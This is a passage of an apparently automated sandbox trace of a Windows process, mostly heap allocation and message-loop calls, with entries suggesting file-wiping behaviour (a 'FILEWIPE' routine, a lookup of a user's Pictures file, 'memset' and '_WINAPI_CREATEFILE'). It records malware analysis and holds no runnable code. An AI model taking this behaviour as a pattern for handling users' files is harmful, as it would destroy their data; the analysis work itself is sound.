(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0190.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0190.134] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.134] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0190.134] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0190.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0190.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.135] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0190.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd558 [0190.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.135] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0190.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0190.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0190.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0190.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0190.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.135] FreeLibrary (hLibModule=0x74f20000) returned 1 [0190.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0190.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0190.135] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0190.135] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0190.135] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0190.135] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0190.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0190.135] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0190.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0190.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0190.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0190.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fe8 [0190.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd798 [0190.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd558 [0190.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0190.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba420 [0190.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd600 [0190.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0190.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0190.136] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.136] CloseHandle (hObject=0x160) returned 1 [0190.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0190.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0190.136] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0190.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae58 | out: hHeap=0x8a0000) returned 1 [0190.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0190.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0190.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0190.137] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0190.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0190.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0190.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0190.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0190.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0190.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0190.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0190.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0190.138] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0190.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0190.138] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0190.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0190.138] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0190.139] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0190.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0190.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0190.139] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.140] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0190.140] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0190.140] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0190.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0190.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0190.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0190.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0190.141] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0190.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0190.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0190.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0190.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0190.141] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\rULw.png", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79a73a50, ftCreationTime.dwHighDateTime=0x1d5e3c6, ftLastAccessTime.dwLowDateTime=0x11687980, ftLastAccessTime.dwHighDateTime=0x1d5dc33, ftLastWriteTime.dwLowDateTime=0x11687980, ftLastWriteTime.dwHighDateTime=0x1d5dc33, nFileSizeHigh=0x0, nFileSizeLow=0x26c2, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="rULw.png", cAlternateFileName="")) returned 0x90af58 [0190.141] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0190.141] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0190.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0190.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0190.141] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0190.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0190.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0190.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0190.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0190.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0190.142] CharLowerBuffW (in: lpsz="byte[9922]", cchLength=0xa | out: lpsz="byte[9922]") returned 0xa [0190.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0190.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0190.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0190.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0190.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0190.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0190.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0190.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0190.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0190.142] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0190.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0190.142] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0190.142] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0190.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0190.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0190.142] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0190.143] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0190.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0190.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.143] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0190.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0190.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0190.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x8e1a20 [0190.143] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x8e1a20, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0190.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0190.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0190.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0190.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0190.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0190.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0190.143] FreeLibrary (hLibModule=0x75c90000) returned 1 [0190.143] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0190.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0190.143] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.143] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0190.144] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0190.144] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0190.144] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0190.144] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.144] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.144] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.144] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0190.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.145] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.145] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0190.145] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.145] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.145] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 